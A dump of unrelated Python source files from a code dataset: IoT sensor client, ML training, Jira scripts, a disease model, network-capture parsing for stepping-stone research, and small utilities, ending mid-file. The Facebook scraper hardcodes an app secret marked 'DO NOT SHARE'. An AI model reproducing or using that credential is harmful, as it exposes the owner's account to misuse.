ReadResource(self.MIN_PRESSURE, FLOAT, pressure),\n ReadResource(self.MAX_PRESSURE, FLOAT, pressure),\n ReadResource(self.MIN_PRESSURE_RANGE, FLOAT, self.pressure_sensor.min_sen),\n ReadResource(self.MAX_PRESSURE_RANGE, FLOAT, self.pressure_sensor.max_sen),\n \n Reset_min_max(self.pressure_sensor, self.RESET_VALUES),\n PressureValue(self.pressure_sensor, self.LINE_PRESSURE, FLOAT, 0.0),\n ReadWriteResource(self.SENSOR_UNITS, STRING, \"PSI\"),\n ReadWriteResource(self.CURRENT_CALIBRATION, STRING, \"Calibration 1\"),\n ReadWriteResource(self.APPLICATION_TYPE, STRING, \"Line Pressure\")\n ]\n self.register(resources)\n \n\nclass SecurityInstance(Lwm2m.Instance):\n LWM2M_SECURITY_MODE_PRE_SHARED_KEY = 0\n LWM2M_SECURITY_MODE_RAW_PUBLIC_KEY = 1\n LWM2M_SECURITY_MODE_CERTIFICATE = 2\n LWM2M_SECURITY_MODE_NONE = 3\n \n # These are the resource Ids for the sercurity instance\n URI = 0\n BOOSTRAP = 1\n SECURITY_MODE = 2\n PUBLIC_KEY = 3\n SERVER_PUBLIC_KEY = 4\n SECRET_KEY = 5\n SMS_SECURITY_MOE = 6\n SMS_KEY_PARAM = 7\n SMS_SECRET_KEY = 8\n SMS_SERVER_ID = 9\n SHORT_SERVER_ID = 10\n HOLDOFF_ID = 11\n BOOTSRAP_TIMEOUT = 12\n \n def __init__(self, instance_id):\n # The init function for the Lwm2m.Instance base class must always be called.\n Lwm2m.Instance.__init__(self, instance_id)\n uri, _, public_key, secret_key = read_lwm2m_info()\n resources = [\n ReadWriteResource(self.URI, STRING, uri),\n ReadWriteResource(self.BOOSTRAP, BOOL, False),\n ReadWriteResource(self.SECURITY_MODE, INT, self.LWM2M_SECURITY_MODE_PRE_SHARED_KEY),\n ReadWriteResource(self.PUBLIC_KEY, OPAQUE, bytearray(public_key)), # , 'utf8')),\n ReadWriteResource(self.SERVER_PUBLIC_KEY, OPAQUE, bytearray()),\n # ReadWriteResource(self.SECRET_KEY, OPAQUE, bytearray(binascii.a2b_hex(secret_key))) ,\n ReadWriteResource(self.SECRET_KEY, OPAQUE, secret_key) ,\n ReadWriteResource(self.SMS_SECURITY_MOE, INT, 0),\n ReadWriteResource(self.SMS_KEY_PARAM, OPAQUE, bytearray()),\n ReadWriteResource(self.SMS_SECRET_KEY, OPAQUE, bytearray()),\n ReadWriteResource(self.SMS_SERVER_ID, INT, 0),\n ReadWriteResource(self.SHORT_SERVER_ID, INT, 123),\n ReadWriteResource(self.HOLDOFF_ID, INT, 10),\n ReadWriteResource(self.BOOTSRAP_TIMEOUT, INT, 0) \n ]\n # The register function must be called to inform the instance what resources it contains\n self.register(resources)\n\n \nclass DeviceIntance(Lwm2m.Instance):\n \n MANUFACTURER = 0\n MODEL_NUMBER = 1\n SERIAL_NUMBER = 2\n FIRMWARE_VERSION = 3\n FACTORY_RESET = 5\n TIMEZONE = 15\n \n def __init__(self, instance_id):\n # The init of the Instance parent class should always be called.\n Lwm2m.Instance.__init__(self, instance_id)\n \n resources = [\n ReadResource(self.MANUFACTURER, STRING, \"Open Mobile Alliance\"),\n ReadResource(self.MODEL_NUMBER, STRING, \"Lightweight M2M Client\"),\n ReadResource(self.SERIAL_NUMBER, STRING, \"345000123\"),\n ReadResource(self.FIRMWARE_VERSION, STRING, \"1.0\"),\n ExecuteResource(self.FACTORY_RESET),\n ReadResource(self.TIMEZONE, STRING, \"Mountain\")\n ]\n # The register function must be called to inform the instance what resources it contains\n self.register(resources) \n\n\ndef build_objects():\n ''' This function will create the lwm2m object classes that are part of our lwm2m client.\n The objects are created using the lwm2m.Object base class, and passing in an instance class that\n serves as the default instance class. The default instance class will be used to create and register\n a new instance when the create_default_instance function is called.\n The security, server, and device objects are mandatory objects in lwm2m.'''\n security_object = Lwm2m.Object(0, \"Security\", SecurityInstance)\n instance = security_object.create_default_instance(0)\n security_object.register([instance])\n \n server_object = Lwm2m.Object(1, \"Server\", ServerInstance)\n instance = server_object.create_default_instance(0)\n server_object.register([instance])\n \n device_object = Lwm2m.Object(3, \"Device\", DeviceIntance)\n instance = device_object.create_default_instance(0)\n device_object.register([instance])\n \n pressure_object = Lwm2m.Object(3323, \"PressureObject\", PressureObjectInstance)\n instance = pressure_object.create_default_instance(1)\n pressure_object.register([instance])\n \n return [security_object, server_object, device_object, pressure_object] \n\nif __name__ == \"__main__\":\n sen = digital.SensorPower(\"senpwr\") \n sen.set()\n\n # StartLwm2mThread takes the name of the endpoint and an iterable that contains all the objects in our system.\n _, endpoint, _, _ = read_lwm2m_info()\n lwm2m_client.StartLwm2mThread(endpoint, build_objects()) \n\n while True:\n value = raw_input(\"Press q to quit. \")\n if value == \"q\":\n break\n","sub_path":"PressureSensorPy/pressure.py","file_name":"pressure.py","file_ext":"py","file_size_in_byte":14649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"27522556","text":"import contextlib\n\nimport torch\nfrom cyy_naive_lib.log import get_logger\n\nfrom cyy_torch_toolbox.executor import Executor\nfrom cyy_torch_toolbox.ml_type import ExecutorHookPoint, StopExecutingException\n\n\nclass Inferencer(Executor):\n def inference(self, use_grad: bool = False, **kwargs: dict) -> bool:\n has_failure: bool = False\n try:\n self._prepare_execution(**kwargs)\n with (\n torch.set_grad_enabled(use_grad),\n torch.cuda.device(self.device)\n if self.cuda_stream is not None\n else contextlib.nullcontext(),\n torch.cuda.stream(self.cuda_stream),\n ):\n self.model.zero_grad(set_to_none=True)\n self._execute_epoch(epoch=1, need_backward=use_grad, in_training=False)\n self.exec_hooks(ExecutorHookPoint.AFTER_EXECUTE)\n except StopExecutingException:\n get_logger().warning(\"stop inference\")\n has_failure = True\n finally:\n self._wait_stream()\n return not has_failure\n\n def _get_backward_loss(self, result):\n return result[\"normalized_batch_loss\"]\n\n def get_gradient(self):\n normal_stop: bool = self.inference(use_grad=True)\n assert normal_stop\n return self.model_util.get_gradient_list()\n","sub_path":"cyy_torch_toolbox/inferencer.py","file_name":"inferencer.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"118421093","text":"import re\nimport sys\nfrom contextlib import contextmanager\nfrom pprint import pprint as p\n\nfrom app import create_app\nfrom app.jiraapi import get_marketplace_jira\nfrom app.models import Application\n\napp = create_app('development')\n\n\n@contextmanager\ndef jira_with_app_context():\n with app.app_context():\n j = get_marketplace_jira(False)\n yield j\n\n\ndef fix_custom_fields():\n with jira_with_app_context() as j:\n bad_issues = j.generic_jira.jira.search_issues('project = MARADMIN AND issuetype = \"Supplier Assessment\" '\n 'AND created >= 2012-05-31 AND created <= 2017-05-23')\n for bad_issue in bad_issues:\n if bad_issue.raw['fields'][j.supplier_field_code] != 0:\n bad_issue.update({j.application_field_code: str(bad_issue.raw['fields'][j.supplier_field_code]),\n j.supplier_field_code: str(0)})\n\n bad_issues = j.generic_jira.jira.search_issues('project = MARADMIN AND issuetype = \"Domain Assessment\" '\n 'AND created >= 2012-05-31 AND created <= 2017-05-23')\n for bad_issue in bad_issues:\n if bad_issue.raw['fields'][j.application_field_code] != 0:\n bad_issue.update({j.supplier_field_code:\n str(re.search(r\"\\(#(.*)\\)$\", bad_issue.fields.summary).group(1)),\n j.application_field_code: str(0)})\n\n\ndef create_approval_task(application_id):\n with jira_with_app_context() as j:\n a = Application.query.filter_by(id=application_id).first()\n a.status = 'submitted'\n a.create_approval_task()\n\n\ndef list_tasks():\n with jira_with_app_context() as j:\n assessment_tasks = j.get_assessment_tasks()\n\n for t in assessment_tasks:\n p(t)\n\n\ndef tasks_by_id():\n with jira_with_app_context() as j:\n p(j.assessment_tasks_by_application_id())\n\n\ndef create_subtask_issuetype():\n with jira_with_app_context() as j:\n j.create_issuetype(\n 'Supplier Assessment Step',\n 'A necessary step for carrying out a supplier assessment',\n subtask=True)\n\n\ndef connect():\n with jira_with_app_context() as j:\n si = j.generic_jira.jira.server_info()\n p(si)\n\n\nif __name__ == '__main__':\n try:\n task_method = getattr(sys.modules[__name__], sys.argv[1])\n\n except AttributeError:\n print('no such task')\n sys.exit(1)\n\n task_method(*sys.argv[2:])\n","sub_path":"jiratasks.py","file_name":"jiratasks.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"196379355","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n#Tan is hyperbolic\n#Actually, sorry, no he isn't\n\n#Github is awesome! \n\nfrom scipy.integrate import odeint\nimport matplotlib.pylab as pylab\n\nlabels = [\n 'susceptibles', \n 'early latents',\n 'late latents',\n 'infectious',\n 'under treatment'\n]\n\ndef calculate_flows(y, t):\n\n # Compartments\n comp_susceptibles = y[0]\n comp_latent_early = y[1]\n comp_latent_late = y[2]\n comp_infectious = y[3]\n comp_treatment = y[4]\n\n # comp = { l:y[i] for i,l in enumerate(labels) }\n\n # Demographic parameters\n rate_birth_pop = 20. / 1e3\n rate_death_pop = 1. / 65.\n pop_total = sum(y)\n \n # Infection parameters\n param_effectivecontact = 10.\n rate_force = param_effectivecontact * comp_infectious / pop_total\n rate_earlyprogress = .1 / .5\n rate_lateprogress = .1 / 100.\n rate_stabilise = .9 / .5\n rate_spontrecover = .6 / 3.\n rate_death_tb = .4 / 3.\n \n # Programmatic parameters\n rate_detect = 1.\n time_treatment = .5\n rate_treatmentcompletion = .9 / time_treatment\n rate_default = .05 / time_treatment\n rate_death_treat = .05 / time_treatment\n \n flows = [\n # Susceptibles\n rate_birth_pop * pop_total \n + rate_treatmentcompletion * comp_treatment \n - (rate_force + rate_death_pop) * comp_susceptibles,\n \n # Early latents\n rate_force * comp_susceptibles \\\n - (rate_earlyprogress + rate_stabilise + rate_death_pop) \\\n * comp_latent_early,\n \n # Late latents\n rate_stabilise * comp_latent_early \\\n + rate_spontrecover * comp_infectious \\\n - (rate_lateprogress + rate_death_pop) * comp_latent_late,\n\n # Infectious\n rate_earlyprogress * comp_latent_early \\\n + rate_lateprogress * comp_latent_late \\\n - (rate_detect + rate_spontrecover + rate_death_tb + rate_death_pop) \\\n * comp_infectious,\n \n # Under treatment\n rate_detect * comp_infectious \\\n - (rate_default + rate_death_treat \\\n + rate_death_pop + rate_treatmentcompletion) \\\n * comp_treatment,\n \n ]\n\n return flows\n\n\npopulation_start = [1e6, 0., 0., 1., 0.]\ntimes = list(range(20))\nsoln = odeint(calculate_flows, population_start, times)\n\nfor i in range(5):\n pylab.subplot(3, 2, i+1)\n pylab.plot(times, soln[:,i])\n pylab.ylabel(labels[i])\n\npylab.xlabel('time')\npylab.tight_layout()\n\npylab.show()\n\n\n\n","sub_path":"simple_tb/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"371457471","text":"class Solution:\n def computeArea(self, A: int, B: int, C: int, D: int, E: int, F: int, G: int, H: int) -> int:\n intersect_area = self.find_intersect(A,B,C,D,E,F,G,H)\n area_1 = self.find_area(A,B,C,D)\n area_2 = self.find_area(E,F,G,H)\n return area_1 + area_2 - intersect_area\n \n def find_area(self, c_1A, c_1B, c_2A, c_2B):\n width = abs(c_1A-c_2A)\n height = abs(c_1B-c_2B)\n return height*width\n \n def find_intersect(self, A, B, C, D, E, F, G, H):\n upper_height = min(H, D)\n lower_height = max(F, B)\n left_width = max(A,E)\n right_width = min(C,G)\n if left_width >= right_width: return 0\n if upper_height <= lower_height: return 0\n return (upper_height-lower_height)*(right_width-left_width)\n","sub_path":"rectange_area_with_intersects.py","file_name":"rectange_area_with_intersects.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"593742227","text":"# encoding: utf-8\n\"https://github.com/genomoncology/related\"\n\nimport related\n\n\n@related.immutable\nclass Person(object):\n first_name = related.StringField()\n second_name = related.StringField()\n\n@related.immutable\nclass RoleModels(object):\n scientists = related.SetField(Person)\n\npeople =[Person(\"f\",\"l\"),Person('n','z')]\nprint(related.to_yaml(RoleModels(scientists=people)))\n\n\"\"\" docker compose sample\nversion: '2'\nservices:\n web:\n build: .\n ports:\n - 5000:5000\n volumes:\n - .:/code\n redis:\n image: redis\n\"\"\"\n\n@related.immutable\nclass Service(object):\n name = related.StringField()\n image = related.StringField(required=False)\n build = related.StringField(required=False)\n ports = related.SequenceField(str, required=False)\n volumes = related.SequenceField(str, required=False)\n command = related.StringField(required=False)\n\n\n@related.immutable\nclass Compose(object):\n version = related.StringField(required=False, default=None)\n services = related.MappingField(Service, \"name\", required=False)\n\n\nfrom os.path import join, dirname\n\nfrom related import to_yaml, from_yaml, to_model\n\nYML_FILE = join(dirname(__file__), \"docker-compose.yml\")\n\n\ndef test_compose_from_yml():\n original_yaml = open(YML_FILE).read().strip()\n yml_dict = from_yaml(original_yaml)\n compose = to_model(Compose, yml_dict)\n\n assert compose.version == '2'\n assert compose.services['web'].ports == [\"5000:5000\"]\n assert compose.services['redis'].image == \"redis\"\n\n generated_yaml = to_yaml(compose,\n suppress_empty_values=True,\n suppress_map_key_values=True).strip()\n\n assert original_yaml == generated_yaml\n\nif __name__ == '__main__':\n test_compose_from_yml()","sub_path":"python-lessons/practices/related_demo/related_sample.py","file_name":"related_sample.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"335718505","text":"def find_hypot(side_1, side_2):\n \"\"\"\n Function to return the length of hypotenuse of r-angle triangle given two short side lengths\n \"\"\"\n hypo = (side_1 * side_1 + side_2 * side_2) ** 0.5\n return hypo\n\n# a = float(input(\"What is the length of the first side? \"))\n# b = float(input(\"What is the length of the second side? \"))\n# print(\"The length of the hypotenuse is\", find_hypot(a,b))\n\nsides = [] # define list called 'sides' to contain the two short side lengths of the right angled triangle\n\nfor i in range(2):\n print(\"What is the length of side\", i+1, \"?\")\n side_length = float(input())\n\n sides.append(side_length) # add inputted value to list\n\nprint(\"The length of the hypotenuse is\", find_hypot(sides[0],sides[1]))\n","sub_path":"5.14.10_exercises.py","file_name":"5.14.10_exercises.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"625134896","text":"import os\r\nimport re\r\nfrom collections import Counter\r\n\r\nclass Logging:\r\n def search():\r\n while True:\r\n try:\r\n x=0\r\n var1=os.listdir('logs')\r\n ln=len(var1)\r\n print(\"Total No of Log_files Parsed:\",ln)\r\n get=input(\"Enter keyword to search: \")\r\n while(x \" + str(k) + \" \" + \"Count \" + \"=> \" + str(v))\r\n #print(var)\r\n ff = open(\"ipcount.log\",'a')\r\n print(var, file=ff) \r\n \r\n if __name__ == '__main__':\r\n apache_log_reader(\"logs/access.log\")\r\n search()\r\n \r\n \r\n\r\n \r\n'''\r\n#splitting access\r\nfopen=open(\"access.log\",'r')\r\nfmd;ltab= ' '\r\nfor x in fopen:\r\n if x==tab:\r\n x.append(\"\\n\")\r\n ff = open(\"asplit.log\",'a')\r\n print(x, file=ff)\r\n \r\n#splitting error\r\nfopen=open(\"error.log\",'r')\r\ntab= ' '\r\nfor x in fopen:\r\n if x==tab:\r\n x.append(\"\\n\")\r\n ff = open(\"ersplit.log\",'a')\r\n print(x, file=ff) \r\n\r\n\r\n\r\n '''\r\n \r\n \r\n","sub_path":"project/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"584190298","text":"import turtle\n\ndef square(t,length):\n\tfor side in range (0,4):\n\t\tt.forward(length)\n\t\tt.right(90)\n\t\t\ndef callDon():\n\ttry:\n\t\tturtle.TurtleScreen._RUNNING = True\n\t\tw = turtle.Screen()\n\t\tw.setup(700, 700)\n\t\tw.clear()\n\t\tw.title(\"two\")\n\t\tw.bgcolor(\"#00ff00\")\n\t\tt = turtle.Turtle()\n\t\tt.pendown()\n\t\tx = 100\n\t\ty = 0\n\t\tcount = 0\n\t\tt.width(10)\n\t\tt.color(\"#ffffff\")\n\t\tt.circle(50)\n\t\tw.exitonclick()\n\tfinally:\n\t\tturtle.Terminator()\n\t\t\ndef main():\n\tcallDon()\n\t\nif __name__ == '__main__':\n\tmain()\n\t\n","sub_path":"projectExample/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"119051007","text":"import pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom sklearn.metrics import mean_squared_error, roc_auc_score\nimport os\nfrom recommender import RecommenderNet\nimport matplotlib.pyplot as plt\nimport csv\n\ndef preprocess_data(val_ratio=0.1):\n my_path = os.path.abspath(os.path.dirname(__file__))\n movie_df = pd.read_csv(os.path.join(my_path, '../dataset/final_csv/movies.csv'))\n rating_df = pd.read_csv(os.path.join(my_path, '../dataset/final_csv/explicit_fb.csv'))\n\n df = pd.merge(rating_df, movie_df, on=\"web_id\").dropna(axis = 0, subset=['movie_id'])\n\n user_ids = df[\"user_id\"].unique().tolist()\n user2user_encoded = {x: i for i, x in enumerate(user_ids)}\n userencoded2user = {i: x for i, x in enumerate(user_ids)}\n movie_ids = df[\"web_id\"].unique().tolist()\n movie2movie_encoded = {x: i for i, x in enumerate(movie_ids)}\n movie_encoded2movie = {i: x for i, x in enumerate(movie_ids)}\n df[\"user\"] = df[\"user_id\"].map(user2user_encoded)\n df[\"movie\"] = df[\"web_id\"].map(movie2movie_encoded)\n df = df.sample(frac=1, random_state=42)\n\n num_users = len(user2user_encoded)\n num_movies = len(movie_encoded2movie)\n df[\"rating\"] = df[\"rating\"].values.astype(np.float32)\n min_rating = min(df[\"rating\"])\n max_rating = max(df[\"rating\"])\n\n\n df = df.sample(frac=1, random_state=42)\n x = df[[\"user\", \"movie\"]].values\n # Normalize the targets between 0 and 1. Makes it easy to train.\n y = df[\"rating\"].apply(lambda x: (x - min_rating) / (max_rating - min_rating)).values\n # Assuming training on 90% of the data and validating on 10%.\n train_indices = int((1.-val_ratio)* df.shape[0])\n x_train, x_val, y_train, y_val = (\n x[:train_indices],\n x[train_indices:],\n y[:train_indices],\n y[train_indices:],\n )\n\n return (x_train, x_val, y_train, y_val, num_users, num_movies)\n\ndef offline_eval(model_path, val_ratio=0.1, EMBEDDING_SIZE=50):\n x_train, x_val, y_train, y_val, num_users, num_movies = preprocess_data(val_ratio)\n model = RecommenderNet(num_users, num_movies, EMBEDDING_SIZE)\n model.load_weights(model_path) \n predictions = model.predict(x = x_val)\n MSE = mean_squared_error(y_val , predictions)\n y_val_binary = np.where(y_val >= 0.5, 1, 0)\n predictions_binary = np.where(predictions >= 0.5, 1, 0)\n AUC = roc_auc_score(y_val_binary, predictions_binary)\n\n return (MSE, AUC)\n\n\ndef data_distribution(report_path, val_ratio=0.1):\n x_train, x_val, y_train, y_val, num_users, num_movies = preprocess_data(val_ratio)\n plt.hist(y_train, bins=5, facecolor=\"blue\", edgecolor=\"black\", alpha=0.7)\n plt.savefig(os.path.join(report_path, 'rate_hist.png'))\n plt.xlabel('normalized rating')\n plt.ylabel('numbers')\n plt.clf()\n plt.hist(x_train[:,0], bins=30, facecolor=\"blue\", edgecolor=\"black\", alpha=0.7)\n plt.savefig(os.path.join(report_path, 'user_hist.png'))\n plt.xlabel('user numbers')\n plt.ylabel('numbers')\n plt.clf()\n plt.hist(x_train[:,1], bins=30, facecolor=\"blue\", edgecolor=\"black\", alpha=0.7)\n plt.savefig(os.path.join(report_path, 'movie_hist.png'))\n plt.xlabel('movie numbers')\n plt.ylabel('numbers')\n plt.clf()\n\n\ndef train_model(model_path, val_ratio=0.1, EMBEDDING_SIZE=50, batch_size=256, epochs=10):\n x_train, x_val, y_train, y_val, num_users, num_movies = preprocess_data(val_ratio)\n\n model = RecommenderNet(num_users, num_movies, EMBEDDING_SIZE)\n model.compile(\n loss=tf.keras.losses.BinaryCrossentropy(), optimizer=keras.optimizers.Adam(lr=0.001)\n )\n\n history = model.fit(\n x=x_train,\n y=y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(x_val, y_val),\n )\n\n model.save_weights(model_path)\n\ndef report_model(model_path, baseline_path, val_ratio=0.1, EMBEDDING_SIZE=50):\n my_path = os.path.abspath(os.path.dirname(__file__))\n if not os.path.isdir(os.path.join(my_path, '../report')):\n os.makedirs(os.path.join(my_path, '../report'))\n report_path = os.path.join(my_path, '../report')\n (MSE, AUC) = offline_eval(model_path, val_ratio, EMBEDDING_SIZE)\n # # print(MAE, AUC)\n (MSE_old, AUC_old) = offline_eval(baseline_path, val_ratio, EMBEDDING_SIZE)\n with open(os.path.join(my_path, '../report/compare.csv'), 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow([\"model version\", \"MAE\", \"AUC\"])\n writer.writerow([\"model\", MSE, AUC])\n writer.writerow([\"baseline\", MSE_old, AUC_old])\n\n\n data_distribution(report_path, val_ratio)\n\n\n","sub_path":"model/train/train_utility.py","file_name":"train_utility.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"283839622","text":"\n\nfrom xai.brain.wordbase.nouns._egghead import _EGGHEAD\n\n#calss header\nclass _EGGHEADS(_EGGHEAD, ):\n\tdef __init__(self,): \n\t\t_EGGHEAD.__init__(self)\n\t\tself.name = \"EGGHEADS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"egghead\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_eggheads.py","file_name":"_eggheads.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"173084870","text":"import urllib.request\nimport json\nimport datetime\nimport time\n\napp_id = \"197134180771589\"\napp_secret = \"28a3eaf06aa029934eb3e136e49fdf01\" # DO NOT SHARE WITH ANYONE!\npage_id = \"TrooperRocks\"\n\naccess_token = app_id + \"|\" + app_secret\n\ndef request_until_succeed(url):\n req = urllib.request.Request(url)\n success = False\n while success is False:\n try:\n response = urllib.request.urlopen(req)\n if response.getcode() == 200:\n success = True\n except Exception as e:\n print(e)\n time.sleep(5)\n\n print(\"Error for URL %s: %s\" % (url, datetime.datetime.now()))\n print(\"Retrying.\")\n\n return response.read().decode(response.headers.get_content_charset())\n\ndef scrapeFacebookEvents(page_id):\n # Construct the URL string; see http://stackoverflow.com/a/37239851 for\n # Reactions parameters\n url = 'https://graph.facebook.com/v2.6/'+page_id+'/events?access_token='+access_token\n\n # retrieve data\n #data = json.loads(request_until_succeed(url))\n\n return request_until_succeed(url)\n","sub_path":"facebook_scrape_events.py","file_name":"facebook_scrape_events.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"578748494","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 2 12:54:01 2020\n\n@author: henry\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 12 10:07:03 2019\n\n@author: henry\n\"\"\"\n\nfrom __future__ import print_function, division\nfrom scapy.all import PcapReader\n\n\n#pcap_file_name=\"data/relay_stepstone-2019-09-11_12-50-38-sc1-1.pcap\"\n#pcap_file_name=\"DeepCorr_Data/Testdata/testdata1_relay_stepstone-2019-09-24_15-38-58-sc1-3.pcap\"\n#pcap_file_name=\"tunnel2_relay_stepstone-2019-09-16_16-19-44-sc1-3.pcap\"\n#pcap_file_name=\"ssh_stepping_stone_scaled/data/tunnel1_relay_stepstone-2019-09-16_16-14-50-sc1-532.pcap\"\n#filename=\"stepping_stone_pairs.csv\"\n\ndef pcap2csv(pcap_file_name, filename, caplength=300,starttime=12, chafflength=600):\n \n packets = PcapReader(pcap_file_name)\n fid = open(filename+\"_Conv.txt\", 'a+')\n fidChaff = open(filename+\"_Chaff.txt\", 'a+')\n\n sizesup1=[]\n sizesup2=[]\n sizesdown1=[]\n sizesdown2=[]\n \n timesup1=[]\n timesup2=[]\n timesdown1=[]\n timesdown2=[]\n\n i_sizesup1=-1\n i_sizesup2=-1\n i_sizesdown1=-1\n i_sizesdown2=-1\n \n t_prev_up1=0\n t_prev_up2=0\n t_prev_down1=0\n t_prev_down2=0\n \n i_Chaff1=0\n i_Chaff2=0\n Chaffpackets1=[]\n Chaffpackets2=[]\n \n start_ip=\"238.7\"\n steppst_ip=\"238.8\"\n end_ip=\"238.9\"\n name=pcap_file_name.split('/')[-1].split('.')[0]\n\n i_total=0\n i_written=0\n open_flows = []\n \n for line in packets:\n if not(line.name=='Ethernet'):\n continue\n t = line.time\n line=line[1]\n \n if not(line.name=='IP'): #\n continue\n if not(line.proto in [6]): #\n continue\n if line.payload.name=='Raw': \n continue\n \n #t = line.time\n length = line.len\n flags=str(line.flags)\n Src=str(line.src)[7:12]\n Dst=str(line.dst)[7:12]\n \n if (line.proto in [6])&('22' in [str(line.sport),str(line.dport)]):\n if (Src in [start_ip, steppst_ip, end_ip])&(Dst in [start_ip, steppst_ip, end_ip]):\n five_tuple = tuple([line.proto, Src + ':' + str(line.sport), Dst + ':' + str(line.dport)])\n else:\n# print(\"What?!?\")\n# print(line.proto)\n# print(line.sport)\n# print(line.dport)\n# print(Src)\n# print(Dst)\n continue\n if not(five_tuple in open_flows) and not(tuple([five_tuple[0],five_tuple[2],five_tuple[1]]) in open_flows):\n open_flows.append(five_tuple)\n \n if len(open_flows)>2:\n print(\"too many connections\")\n fid.close() \n return 0\n\n if i_total==0:\n t_start=t\n i_total+=1\n continue\n i_total+=1\n if t-t_start start to process pcap_file_name: [%s]\"%(pcap_file_name))\n pcap2csv(pcap_file_name,filename,caplength,starttime)\n\n\nif __name__ == \"__main__\":\n import argparse\n \n #filename=\"stepping_stone_pairs.csv\"\n caplength=300\n starttime=5\n\n parser = argparse.ArgumentParser(description='convert txt file to flows')\n parser.add_argument('-p', '--pcap', default=None,\n help='specify the pcap file you want to process')\n parser.add_argument('-f', '--folder', default=None,\n help='specify the folder you want to loop through')\n parser.add_argument('-n', '--name', default=None,\n help='specify the output filename')\n args = parser.parse_args()\n \n filename=args.name\n \n if args.pcap:\n pcap2csv(args.pcap, args.pcap.rsplit('.pcap')[0] + '.csv',caplength,starttime)\n elif args.folder:\n loop_folder(args.folder, filename,caplength,starttime)\n else:\n parser.print_help()","sub_path":"DetGenExt/SecureComm/src/Flowfunctions/Flowstats_new.py","file_name":"Flowstats_new.py","file_ext":"py","file_size_in_byte":10577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"362387560","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 1: YOLOv2, 2: AlexNet, 3: VGG-16, 4: GoogLeNet\nmodel = 1\n\ndfs = pd.read_excel(\"t.xlsx\", sheet_name=None, header=None)\nif model == 1:\n ms = \"YOLOv2\"\nelif model == 2:\n ms = \"AlexNet\"\nelif model == 3:\n ms = \"VGG-16\"\nelif model == 4:\n ms = \"GoogLeNet\"\nsh = dfs[\"Memory\"]\nprint(sh)\n\n\nlabels = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\"]\nx = np.arange(len(labels))\n\nplt.rcParams.update({\"font.size\": 13})\nfig, ax = plt.subplots()\nplt.subplots_adjust(top=0.95, right=0.95)\n\n# Workaround for this: https://bugs.python.org/issue32790\ndef fmtFlt(f, digits):\n s = (\"{:#.\" + str(digits) + \"g}\").format(f)\n sz = len(s) - 1\n if sz < digits:\n s += \"0\"\n if s[-1] == \".\":\n s = s[:-1]\n return s\n\ndef autolabel(rects):\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for rect in rects:\n height = rect.get_height()\n ax.annotate(fmtFlt(height, 3),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\ndef addData():\n y = []\n for i in range(0, 6):\n y.append(-sh[i + 1][model] + sh[1][model])\n y = np.array(y) / 1000\n g = ax.bar(x, y)\n #g = ax.plot(x, y)\n\n autolabel(g)\n\naddData()\n\n\n#plt.ylim(plt.ylim()*1.1)\nybot, ytop = plt.ylim()\nplt.ylim(ybot, ytop*1.05)\nax.set_xlabel(\"Number of devices\")\nax.set_ylabel(\"Memory savings over one device [MB]\")\nax.set_xticks(x)\nax.set_xticklabels(labels)\n\nplt.savefig(\"plot_mem.pdf\")\nplt.show()\n","sub_path":"scripts/plotmem.py","file_name":"plotmem.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"589583000","text":"#!/usr/bin/python\nfrom __future__ import print_function\nimport sortphotos\n\nSCAN_DIR = '/media/MEDIA1/Alex-Photos/Unsorted'\nPHOTO_DIR = '/media/MEDIA1/Alex-Photos'\n\n\ndef main():\n sort_photos(SCAN_DIR,PHOTO_DIR)\n\ndef sort_photos(src_dir,dest_dir):\n \"\"\" Use the sort photos library from \n https://github.com/andrewning/sortphotos\n to do the actual sorting\n \"\"\"\n sort_format='%Y/%m-%b'\n rename_format=None\n\n sortphotos.sortPhotos(src_dir, 